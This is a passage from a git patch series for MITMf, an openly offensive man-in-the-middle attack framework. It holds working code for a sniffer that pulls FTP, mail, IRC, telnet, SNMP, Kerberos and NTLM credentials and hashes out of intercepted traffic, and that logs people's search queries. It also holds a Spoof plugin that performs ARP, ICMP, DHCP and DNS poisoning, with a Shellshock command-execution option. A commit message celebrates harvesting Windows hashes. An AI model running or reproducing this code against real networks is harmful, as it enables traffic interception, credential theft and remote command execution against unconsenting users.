'passwd', 'session_password', 'sessionpassword', - 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' - 'passwort', 'passwrd', 'wppassword', 'upasswd'] - - if os.geteuid() != 0: - sys.exit("[-] Sniffer plugin requires root privileges") - - n = NetCreds() - #if not self.parse: - t = threading.Thread(name="sniffer", target=n.start, args=(self.interface,)) - t.setDaemon(True) - t.start() - - #else: - # pcap = rdpcap(self.parse) - # for pkt in pcap: - # n.pkt_parser(pkt) - - #def add_options(self, options): - # options.add_argument('--parse', dest='parse', type=str, default=None, help='Parse pcap') - - def sendRequest(self, request): - #Capture google searches - if ('google' in request.headers['host']): - if ('search' in request.uri): - self.captureQueries('q', request) - - #Capture bing searches - if ('bing' in request.headers['host']): - if ('Suggestions' in request.uri): - self.captureQueries('qry', request) - - #Capture yahoo searches - if ('search.yahoo' in request.headers['host']): - if ('nresults' in request.uri): - self.captureQueries('command', request) - - self.captureURLCreds(request) - - def captureQueries(self, search_param, request): - try: - for param in request.uri.split('&'): - if param.split('=')[0] == search_param: - query = str(param.split('=')[1]) - if query: - mitmf_logger.info(request.clientInfo + "is querying %s for: %s" % (request.headers['host'], query)) - except Exception, e: - error = str(e) - mitmf_logger.warning(request.clientInfo + "Error parsing search query %s" % error) - - def captureURLCreds(self, request): - ''' - checks for creds passed via GET requests or just in the url - It's surprising to see how many people still do this (please stahp) - ''' - - url = request.uri - - username = None - password = None - for user in self.http_userfields: - #search = re.findall("("+ user +")=([^&|;]*)", request.uri, re.IGNORECASE) - search = re.search('(%s=[^&]+)' % user, url, re.IGNORECASE) - if search: - username = search.group() - - for passw in self.http_passfields: - #search = re.findall("(" + passw + ")=([^&|;]*)", request.uri, re.IGNORECASE) - search = re.search('(%s=[^&]+)' % passw, url, re.IGNORECASE) - if search: - password = search.group() - - if (username and password): - mitmf_logger.warning(request.clientInfo + "Possible Credentials (Method: %s, Host: %s):\n%s" % (request.command, request.headers['host'], url)) - -class NetCreds: - - def __init__(self): - self.pkt_frag_loads = OrderedDict() - self.challenge_acks = OrderedDict() - self.mail_auths = OrderedDict() - self.telnet_stream = OrderedDict() - - # Regexs - self.authenticate_re = '(www-|proxy-)?authenticate' - self.authorization_re = '(www-|proxy-)?authorization' - self.ftp_user_re = r'USER (.+)\r\n' - self.ftp_pw_re = r'PASS (.+)\r\n' - self.irc_user_re = r'NICK (.+?)((\r)?\n|\s)' - self.irc_pw_re = r'NS IDENTIFY (.+)' - self.mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)' - self.mail_auth_re1 = '(\d+ )?login ' - self.NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+' - self.NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' - - def start(self, interface): - try: - sniff(iface=interface, prn=self.pkt_parser, store=0) - except Exception: - pass - - def frag_remover(self, ack, load): - ''' - Keep the FILO OrderedDict of frag loads from getting too large - 3 points of limit: - Number of ip_ports < 50 - Number of acks per ip:port < 25 - Number of chars in load < 5000 - ''' - - # Keep the number of IP:port mappings below 50 - # last=False pops the oldest item rather than the latest - while len(self.pkt_frag_loads) > 50: - self.pkt_frag_loads.popitem(last=False) - - # Loop through a deep copy dict but modify the original dict - copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - if len(copy_pkt_frag_loads[ip_port]) > 0: - # Keep 25 ack:load's per ip:port - while len(copy_pkt_frag_loads[ip_port]) > 25: - self.pkt_frag_loads[ip_port].popitem(last=False) - - # Recopy the new dict to prevent KeyErrors for modifying dict in loop - copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - # Keep the load less than 75,000 chars - for ack in copy_pkt_frag_loads[ip_port]: - # If load > 5000 chars, just keep the last 200 chars - if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: - self.pkt_frag_loads[ip_port][ack] = self.pkt_frag_loads[ip_port][ack][-200:] - - def frag_joiner(self, ack, src_ip_port, load): - ''' - Keep a store of previous fragments in an OrderedDict named pkt_frag_loads - ''' - for ip_port in self.pkt_frag_loads: - if src_ip_port == ip_port: - if ack in self.pkt_frag_loads[src_ip_port]: - # Make pkt_frag_loads[src_ip_port][ack] = full load - old_load = self.pkt_frag_loads[src_ip_port][ack] - concat_load = old_load + load - return OrderedDict([(ack, concat_load)]) - - return OrderedDict([(ack, load)]) - - def pkt_parser(self, pkt): - ''' - Start parsing packets here - ''' - - if pkt.haslayer(Raw): - load = pkt[Raw].load - - # Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control - if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6): - return - - # UDP - if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw): - - src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport) - dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport) - - # SNMP community strings - if pkt.haslayer(SNMP): - self.parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP]) - return - - # Kerberos over UDP - decoded = self.Decode_Ip_Packet(str(pkt)[14:]) - kerb_hash = self.ParseMSKerbv5UDP(decoded['data'][8:]) - if kerb_hash: - self.printer(src_ip_port, dst_ip_port, kerb_hash) - - # TCP - elif pkt.haslayer(TCP) and pkt.haslayer(Raw): - - ack = str(pkt[TCP].ack) - seq = str(pkt[TCP].seq) - src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport) - dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport) - self.frag_remover(ack, load) - self.pkt_frag_loads[src_ip_port] = self.frag_joiner(ack, src_ip_port, load) - full_load = self.pkt_frag_loads[src_ip_port][ack] - - # Limit the packets we regex to increase efficiency - # 750 is a bit arbitrary but some SMTP auth success pkts - # are 500+ characters - if 0 < len(full_load) < 750: - - # FTP - ftp_creds = self.parse_ftp(full_load, dst_ip_port) - if len(ftp_creds) > 0: - for msg in ftp_creds: - self.printer(src_ip_port, dst_ip_port, msg) - return - - # Mail - mail_creds_found = self.mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq) - - # IRC - irc_creds = self.irc_logins(full_load) - if irc_creds != None: - self.printer(src_ip_port, dst_ip_port, irc_creds) - return - - # Telnet - self.telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) - #if telnet_creds != None: - # printer(src_ip_port, dst_ip_port, telnet_creds) - # return - - # HTTP and other protocols that run on TCP + a raw load - self.other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) - - def telnet_logins(self, src_ip_port, dst_ip_port, load, ack, seq): - ''' - Catch telnet logins and passwords - ''' - - msg = None - - if src_ip_port in self.telnet_stream: - # Do a utf decode in case the client sends telnet options before their username - # No one would care to see that - try: - self.telnet_stream[src_ip_port] += load.decode('utf8') - except UnicodeDecodeError: - pass - - # \r or \r\n terminate commands in telnet if my pcaps are to be believed - if '\r' in self.telnet_stream[src_ip_port] or '\r\n' in self.telnet_stream[src_ip_port]: - telnet_split = self.telnet_stream[src_ip_port].split(' ', 1) - cred_type = telnet_split[0] - value = telnet_split[1].replace('\r\n', '').replace('\r', '') - # Create msg, the return variable - msg = 'Telnet %s: %s' % (cred_type, value) - del self.telnet_stream[src_ip_port] - self.printer(src_ip_port, dst_ip_port, msg) - - # This part relies on the telnet packet ending in - # "login:", "password:", or "username:" and being <750 chars - # Haven't seen any false+ but this is pretty general - # might catch some eventually - # maybe use dissector.py telnet lib? - if len(self.telnet_stream) > 100: - self.telnet_stream.popitem(last=False) - mod_load = load.lower().strip() - if mod_load.endswith('username:') or mod_load.endswith('login:'): - self.telnet_stream[dst_ip_port] = 'username ' - elif mod_load.endswith('password:'): - self.telnet_stream[dst_ip_port] = 'password ' - - def ParseMSKerbv5TCP(self, Data): - ''' - Taken from Pcredz because I didn't want to spend the time doing this myself - I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel? - Maybe replace this eventually with the kerberos python lib - Parses Kerberosv5 hashes from packets - ''' - try: - MsgType = Data[21:22] - EncType = Data[43:44] - MessageType = Data[32:33] - except IndexError: - return - - if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02": - if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33": - HashLen = struct.unpack(' 1: - lines = full_load.count('\r\n') - if lines > 1: - full_load = full_load.split('\r\n')[-2] # -1 is '' - return full_load - - def parse_ftp(self, full_load, dst_ip_port): - ''' - Parse out FTP creds - ''' - print_strs = [] - - # Sometimes FTP packets double up on the authentication lines - # We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n" - full_load = self.double_line_checker(full_load, 'USER') - - # FTP and POP potentially use idential client > server auth pkts - ftp_user = re.match(self.ftp_user_re, full_load) - ftp_pass = re.match(self.ftp_pw_re, full_load) - - if ftp_user: - msg1 = 'FTP User: %s' % ftp_user.group(1).strip() - print_strs.append(msg1) - if dst_ip_port[-3:] != ':21': - msg2 = 'Nonstandard FTP port, confirm the service that is running on it' - print_strs.append(msg2) - - elif ftp_pass: - msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip() - print_strs.append(msg1) - if dst_ip_port[-3:] != ':21': - msg2 = 'Nonstandard FTP port, confirm the service that is running on it' - print_strs.append(msg2) - - return print_strs - - def mail_decode(self, src_ip_port, dst_ip_port, mail_creds): - ''' - Decode base64 mail creds - ''' - try: - decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8') - decoded = decoded.replace('\x00', ' ') - except TypeError: - decoded = None - except UnicodeDecodeError as e: - decoded = None - - if decoded != None: - msg = 'Decoded: %s' % decoded - self.printer(src_ip_port, dst_ip_port, msg) - - def mail_logins(self, full_load, src_ip_port, dst_ip_port, ack, seq): - ''' - Catch IMAP, POP, and SMTP logins - ''' - # Handle the first packet of mail authentication - # if the creds aren't in the first packet, save it in mail_auths - - # mail_auths = 192.168.0.2 : [1st ack, 2nd ack...] - - found = False - - # Sometimes mail packets double up on the authentication lines - # We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n" - full_load = self.double_line_checker(full_load, 'auth') - - # Client to server 2nd+ pkt - if src_ip_port in self.mail_auths: - if seq in self.mail_auths[src_ip_port][-1]: - stripped = full_load.strip('\r\n') - try: - decoded = base64.b64decode(stripped) - msg = 'Mail authentication: %s' % decoded - self.printer(src_ip_port, dst_ip_port, msg) - except TypeError: - pass - self.mail_auths[src_ip_port].append(ack) - - # Server responses to client - # seq always = last ack of tcp stream - elif dst_ip_port in self.mail_auths: - if seq in self.mail_auths[dst_ip_port][-1]: - # Look for any kind of auth failure or success - a_s = 'Authentication successful' - a_f = 'Authentication failed' - # SMTP auth was successful - if full_load.startswith('235') and 'auth' in full_load.lower(): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_s) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # SMTP failed - elif full_load.startswith('535 '): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_f) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # IMAP/POP/SMTP failed - elif ' fail' in full_load.lower(): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_f) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # IMAP auth success - elif ' OK [' in full_load: - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_s) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - - # Pkt was not an auth pass/fail so its just a normal server ack - # that it got the client's first auth pkt - else: - if len(self.mail_auths) > 100: - self.mail_auths.popitem(last=False) - self.mail_auths[dst_ip_port].append(ack) - - # Client to server but it's a new TCP seq - # This handles most POP/IMAP/SMTP logins but there's at least one edge case - else: - mail_auth_search = re.match(self.mail_auth_re, full_load, re.IGNORECASE) - if mail_auth_search != None: - auth_msg = full_load - # IMAP uses the number at the beginning - if mail_auth_search.group(1) != None: - auth_msg = auth_msg.split()[1:] - else: - auth_msg = auth_msg.split() - # Check if its a pkt like AUTH PLAIN dvcmQxIQ== - # rather than just an AUTH PLAIN - if len(auth_msg) > 2: - mail_creds = ' '.join(auth_msg[2:]) - msg = 'Mail authentication: %s' % mail_creds - self.printer(src_ip_port, dst_ip_port, msg) - - self.mail_decode(src_ip_port, dst_ip_port, mail_creds) - try: - del self.mail_auths[src_ip_port] - except KeyError: - pass - found = True - - # Mail auth regex was found and src_ip_port is not in mail_auths - # Pkt was just the initial auth cmd, next pkt from client will hold creds - if len(self.mail_auths) > 100: - self.mail_auths.popitem(last=False) - self.mail_auths[src_ip_port] = [ack] - - # At least 1 mail login style doesn't fit in the original regex: - # 1 login "username" "password" - # This also catches FTP authentication! - # 230 Login successful. - elif re.match(self.mail_auth_re1, full_load, re.IGNORECASE) != None: - - # FTP authentication failures trigger this - #if full_load.lower().startswith('530 login'): - # return - - auth_msg = full_load - auth_msg = auth_msg.split() - if 2 < len(auth_msg) < 5: - mail_creds = ' '.join(auth_msg[2:]) - msg = 'Authentication: %s' % mail_creds - self.printer(src_ip_port, dst_ip_port, msg) - self.mail_decode(src_ip_port, dst_ip_port, mail_creds) - found = True - - if found == True: - return True - - def irc_logins(self, full_load): - ''' - Find IRC logins - ''' - user_search = re.match(self.irc_user_re, full_load) - pass_search = re.match(self.irc_pw_re, full_load) - if user_search: - msg = 'IRC nick: %s' % user_search.group(1) - return msg - if pass_search: - msg = 'IRC pass: %s' % pass_search.group(1) - self.printer(src_ip_port, dst_ip_port, msg) - return pass_search - - def headers_to_dict(self, header_lines): - ''' - Convert the list of header lines into a dictionary - ''' - headers = {} - # Incomprehensible list comprehension flattens list of headers - # that are each split at ': ' - # http://stackoverflow.com/a/406296 - headers_list = [x for line in header_lines for x in line.split(': ', 1)] - headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) - # Make the header key (like "Content-Length") lowercase - for header in headers_dict: - headers[header.lower()] = headers_dict[header] - - return headers - - def parse_http_load(self, full_load, http_methods): - ''' - Split the raw load into list of headers and body string - ''' - try: - headers, body = full_load.split("\r\n\r\n", 1) - except ValueError: - headers = full_load - body = '' - header_lines = headers.split("\r\n") - - # Pkts may just contain hex data and no headers in which case we'll - # still want to parse them for usernames and password - http_line = self.get_http_line(header_lines, http_methods) - if not http_line: - headers = '' - body = full_load - - header_lines = [line for line in header_lines if line != http_line] - - return http_line, header_lines, body - - def get_http_line(self, header_lines, http_methods): - ''' - Get the header with the http command - ''' - for header in header_lines: - for method in http_methods: - # / is the only char I can think of that's in every http_line - # Shortest valid: "GET /", add check for "/"? - if header.startswith(method): - http_line = header - return http_line - - - def other_parser(self, src_ip_port, dst_ip_port, full_load, ack, seq, pkt): - - #For now we will parse the HTTP headers through scapy and not through Twisted - #This will have to get changed in the future, seems a bit redundent - http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] - http_line, header_lines, body = self.parse_http_load(full_load, http_methods) - headers = self.headers_to_dict(header_lines) - - # Kerberos over TCP - decoded = self.Decode_Ip_Packet(str(pkt)[14:]) - kerb_hash = self.ParseMSKerbv5TCP(decoded['data'][20:]) - if kerb_hash: - self.printer(src_ip_port, dst_ip_port, kerb_hash) - - # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL) - NTLMSSP2 = re.search(self.NTLMSSP2_re, full_load, re.DOTALL) - NTLMSSP3 = re.search(self.NTLMSSP3_re, full_load, re.DOTALL) - if NTLMSSP2: - self.parse_ntlm_chal(NTLMSSP2.group(), ack) - if NTLMSSP3: - ntlm_resp_found = self.parse_ntlm_resp(NTLMSSP3.group(), seq) - if ntlm_resp_found != None: - self.printer(src_ip_port, dst_ip_port, ntlm_resp_found) - - # Look for authentication headers - if len(headers) == 0: - authenticate_header = None - authorization_header = None - for header in headers: - authenticate_header = re.match(self.authenticate_re, header) - authorization_header = re.match(self.authorization_re, header) - if authenticate_header or authorization_header: - break - - if authorization_header or authenticate_header: - # NETNTLM - netntlm_found = self.parse_netntlm(authenticate_header, authorization_header, headers, ack, seq) - if netntlm_found != None: - self.printer(src_ip_port, dst_ip_port, netntlm_found) - - def parse_netntlm(self, authenticate_header, authorization_header, headers, ack, seq): - ''' - Parse NTLM hashes out - ''' - # Type 2 challenge from server - if authenticate_header != None: - chal_header = authenticate_header.group() - self.parse_netntlm_chal(headers, chal_header, ack) - - # Type 3 response from client - elif authorization_header != None: - resp_header = authorization_header.group() - msg = self.parse_netntlm_resp_msg(headers, resp_header, seq) - if msg != None: - return msg - - def parse_snmp(self, src_ip_port, dst_ip_port, snmp_layer): - ''' - Parse out the SNMP version and community string - ''' - if type(snmp_layer.community.val) == str: - ver = snmp_layer.version.val - msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val) - self.printer(src_ip_port, dst_ip_port, msg) - return True - - def parse_netntlm_chal(self, headers, chal_header, ack): - ''' - Parse the netntlm server challenge - https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py - ''' - header_val2 = headers[chal_header] - header_val2 = header_val2.split(' ', 1) - # The header value can either start with NTLM or Negotiate - if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': - msg2 = header_val2[1] - msg2 = base64.decodestring(msg2) - self.parse_ntlm_chal(ack, msg2) - - def parse_ntlm_chal(self, msg2, ack): - ''' - Parse server challenge - ''' - - Signature = msg2[0:8] - msg_type = struct.unpack(" 50: - self.challenge_acks.popitem(last=False) - self.challenge_acks[ack] = ServerChallenge - - def parse_netntlm_resp_msg(self, headers, resp_header, seq): - ''' - Parse the client response to the challenge - ''' - header_val3 = headers[resp_header] - header_val3 = header_val3.split(' ', 1) - - # The header value can either start with NTLM or Negotiate - if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate': - msg3 = base64.decodestring(header_val3[1]) - return self.parse_ntlm_resp(msg3, seq) - - def parse_ntlm_resp(self, msg3, seq): - ''' - Parse the 3rd msg in NTLM handshake - Thanks to psychomario - ''' - - if seq in self.challenge_acks: - challenge = self.challenge_acks[seq] - else: - challenge = 'CHALLENGE NOT FOUND' - - if len(msg3) > 43: - # Thx to psychomario for below - lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44]) - lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen]) - nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen]) - domain = msg3[domoff:domoff+domlen].replace("\0", "") - user = msg3[useroff:useroff+userlen].replace("\0", "") - # Original check by psychomario, might be incorrect? - #if lmhash != "0"*48: #NTLMv1 - if ntlen == 24: #NTLMv1 - msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge) - return msg - elif ntlen > 60: #NTLMv2 - msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:]) - return msg - - def printer(self, src_ip_port, dst_ip_port, msg): - if dst_ip_port != None: - print_str = '%s --> %s %s' % (src_ip_port, dst_ip_port,msg) - # All credentials will have dst_ip_port, URLs will not - mitmf_logger.info(print_str) - else: - print_str = '%s %s' % (src_ip_port.split(':')[0], msg) - mitmf_logger.info(print_str) diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 0712dc7..148e84c 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -19,111 +19,122 @@ # import logging -import sys +from sys import exit from core.utils import SystemConfig, IpTables -from core.sslstrip.DnsCache import DnsCache -from core.wrappers.protocols import _ARP, _DHCP, _ICMP +from core.protocols.arp.ARPpoisoner import ARPpoisoner +from core.protocols.arp.ARPWatch import ARPWatch +from core.dnschef.DNSchef import DNSChef +from core.protocols.dhcp.DHCPServer import DHCPServer +from core.protocols.icmp.ICMPpoisoner import ICMPpoisoner from plugins.plugin import Plugin -from core.dnschef.dnschef import DNSChef - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import * class Spoof(Plugin): - name = "Spoof" - optname = "spoof" - desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" - version = "0.6" - has_opts = True + name = "Spoof" + optname = "spoof" + desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" + tree_output = list() + version = "0.6" + has_opts = True - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.dnscfg = options.configfile['MITMf']['DNS'] - self.dhcpcfg = options.configfile['Spoof']['DHCP'] - self.target = options.target - self.manualiptables = options.manualiptables - self.protocolInstances = [] + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.dnscfg = self.config['MITMf']['DNS'] + self.dhcpcfg = self.config['Spoof']['DHCP'] + self.targets = options.targets + self.manualiptables = options.manualiptables + self.mymac = SystemConfig.getMAC(options.interface) + self.myip = SystemConfig.getIP(options.interface) + self.protocolInstances = [] - #Makes scapy more verbose - debug = False - if options.log_level is 'debug': - debug = True + #Makes scapy more verbose + debug = False + if options.log_level == 'debug': + debug = True - if options.arp: + if options.arp: - if not options.gateway: - sys.exit("[-] --arp argument requires --gateway") + if not options.gateway: + exit("[-] --arp argument requires --gateway") - arp = _ARP(options.gateway, options.interface, options.mac_address) - arp.target = options.target - arp.arpmode = options.arpmode - arp.debug = debug + if options.targets is None: + #if were poisoning whole subnet, start ARP-Watch + arpwatch = ARPWatch(options.gateway, self.myip, options.interface) + arpwatch.debug = debug - self.protocolInstances.append(arp) + self.tree_output.append("ARPWatch online") + self.protocolInstances.append(arpwatch) - elif options.icmp: + arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets) + arp.arpmode = options.arpmode + arp.debug = debug - if not options.gateway: - sys.exit("[-] --icmp argument requires --gateway") + self.protocolInstances.append(arp) - if not options.target: - sys.exit("[-] --icmp argument requires --target") - icmp = _ICMP(options.interface, options.target, options.gateway, options.ip_address) - icmp.debug = debug + elif options.icmp: - self.protocolInstances.append(icmp) + if not options.gateway: + exit("[-] --icmp argument requires --gateway") - elif options.dhcp: + if not options.targets: + exit("[-] --icmp argument requires --targets") - if options.target: - sys.exit("[-] --target argument invalid when DCHP spoofing") + icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, options.ip_address) + icmp.debug = debug - dhcp = _DHCP(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) - dhcp.shellshock = options.shellshock - dhcp.debug = debug - self.protocolInstances.append(dhcp) + self.protocolInstances.append(icmp) - if options.dns: + elif options.dhcp: - if not options.manualiptables: - if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, self.dnscfg['port']) + if options.targets: + exit("[-] --targets argument invalid when DCHP spoofing") - DNSChef.getInstance().loadRecords(self.dnscfg) + dhcp = DHCPServer(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) + dhcp.shellshock = options.shellshock + dhcp.debug = debug + self.protocolInstances.append(dhcp) - if not options.arp and not options.icmp and not options.dhcp and not options.dns: - sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") + if options.dns: - SystemConfig.setIpForwarding(1) + if not options.manualiptables: + if IpTables.getInstance().dns is False: + IpTables.getInstance().DNS(self.myip, self.dnscfg['port']) - if not options.manualiptables: - if IpTables.getInstance().http is False: - IpTables.getInstance().HTTP(options.listen) + DNSChef.getInstance().loadRecords(self.dnscfg) - for protocol in self.protocolInstances: - protocol.start() + if not options.arp and not options.icmp and not options.dhcp and not options.dns: + exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") - def add_options(self, options): - group = options.add_mutually_exclusive_group(required=False) - group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing') - group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') - group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') - options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries') - options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') - options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') - options.add_argument('--target', dest='target', default=None, help='Specify a host to poison [default: subnet]') - options.add_argument('--arpmode',type=str, dest='arpmode', default='req', choices=["req", "rep"], help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]') - #options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') + SystemConfig.setIpForwarding(1) - def finish(self): - for protocol in self.protocolInstances: - if hasattr(protocol, 'stop'): - protocol.stop() + if not options.manualiptables: + IpTables.getInstance().Flush() + if IpTables.getInstance().http is False: + IpTables.getInstance().HTTP(options.listen) - if not self.manualiptables: - IpTables.getInstance().Flush() + for protocol in self.protocolInstances: + protocol.start() - SystemConfig.setIpForwarding(0) + def add_options(self, options): + group = options.add_mutually_exclusive_group(required=False) + group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing') + group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') + group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') + options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries') + options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') + options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') + options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]') + options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') + + def finish(self): + for protocol in self.protocolInstances: + if hasattr(protocol, 'stop'): + protocol.stop() + + if not self.manualiptables: + IpTables.getInstance().Flush() + + SystemConfig.setIpForwarding(0) diff --git a/plugins/Upsidedownternet.py b/plugins/Upsidedownternet.py index 959f96c..402c9e5 100644 --- a/plugins/Upsidedownternet.py +++ b/plugins/Upsidedownternet.py @@ -23,8 +23,6 @@ from cStringIO import StringIO from plugins.plugin import Plugin from PIL import Image -mitmf_logger = logging.getLogger('mitmf') - class Upsidedownternet(Plugin): name = "Upsidedownternet" optname = "upsidedownternet" @@ -65,7 +63,7 @@ class Upsidedownternet(Plugin): im.save(output, format=image_type) data = output.getvalue() output.close() - mitmf_logger.info("%s Flipped image" % request.client.getClientIP()) + mitmf_logger.info("{} Flipped image".format(request.client.getClientIP())) except Exception as e: - mitmf_logger.info("%s Error: %s" % (request.client.getClientIP(), e)) + mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e)) return {'request': request, 'data': data} diff --git a/plugins/__init__.py b/plugins/__init__.py index 5026fd4..155e900 100644 --- a/plugins/__init__.py +++ b/plugins/__init__.py @@ -3,4 +3,3 @@ import os import glob __all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")] - diff --git a/plugins/plugin.py b/plugins/plugin.py index b73486d..9befa33 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -2,9 +2,12 @@ The base plugin class. This shows the various methods that can get called during the MITM attack. ''' +from core.configwatcher import ConfigWatcher +import logging +mitmf_logger = logging.getLogger('mitmf') -class Plugin(object): +class Plugin(ConfigWatcher, object): name = "Generic plugin" optname = "generic" desc = "" @@ -15,6 +18,10 @@ class Plugin(object): '''Called if plugin is enabled, passed the options namespace''' self.options = options + def startThread(self, options): + '''Anything that will subclass this function will be a thread''' + return + def add_options(options): '''Add your options to the options parser''' raise NotImplementedError @@ -27,6 +34,10 @@ class Plugin(object): '''Handles outgoing request''' raise NotImplementedError + def pluginReactor(self, strippingFactory): + '''This sets up another instance of the reactor on a diffrent port''' + pass + def handleResponse(self, request, data): ''' Handles all non-image responses by default. See Upsidedownternet diff --git a/requirements.txt b/requirements.txt index aa31339..75fc1ad 100644 --- a/requirements.txt +++ b/requirements.txt @@ -14,5 +14,6 @@ ipy pyopenssl service_identity watchdog +impacket capstone pypcap From 7aad9879d1c02ea603e01ccf9d8a733d5a899974 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Mon, 27 Apr 2015 19:19:34 +0200 Subject: [PATCH 03/20] version bump in readme --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e07b1ce..be59559 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -MITMf V0.9.6 +MITMf V0.9.7 ============ Framework for Man-In-The-Middle attacks From 08b9029a96a94977d40f59ce6183b50f89d4ae32 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 28 Apr 2015 02:03:12 +0200 Subject: [PATCH 04/20] Responder's MDNS/LLMNR/NBTNS poisoners are back in action (better than ever), only WPAD remains. Tested against Windows 7 and 8, got hashes 100% of the time! \o/ The rest of the servers will be added in after WPAD is fixed. Next step is to fix the logging... frankly i rather just log everything into the main mitmf.log folder since it's very grep'able. Also the exact output is going to need tweaking, the lines are wayy to long --- .../fingerprinter/LANFingerprinter.py | 384 ++++++++++-------- .../fingerprinter/RAPLANMANPackets.py | 18 +- core/responder/llmnr/LLMNRPoisoner.py | 37 +- core/responder/mdns/MDNSPoisoner.py | 48 ++- .../responder/mdns/{__init.py => __init__.py} | 0 core/responder/nbtns/NBTNSPoisoner.py | 126 +++--- plugins/Responder.py | 10 +- 7 files changed, 327 insertions(+), 296 deletions(-) rename 